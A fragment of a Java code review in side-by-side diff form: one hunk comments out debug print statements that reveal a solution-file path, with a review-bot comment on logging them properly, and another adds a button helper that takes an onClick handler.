System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName()); //System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName());
System.out.println("fileName: " + fileName + " == className: " + className ); //System.out.println("fileName: " + fileName + " == className: " + className );
lesson.setLessonSolutionFileName(absoluteFile); lesson.setLessonSolutionFileName(absoluteFile);
} }
} }
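Review bot: The two `DEBUG` `System.out.println` lines are left behind as commented-out code rather than removed; delete them outright, or if the output is still wanted route it through a logger at debug level so it does not print the resolved `absoluteFile` path to stdout in production. The enclosing method of `Course` starts and ends outside the hunk.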


@ -116,6 +116,15 @@ public class ECSFactory
return (b); return (b);
} }
public static Element makeButton(String text, String onClickFunction)
{
Input b = (Input)makeButton(text);
b.setOnClick(onClickFunction);
return (b);
}
/** /**
* Description of the Method * Description of the Method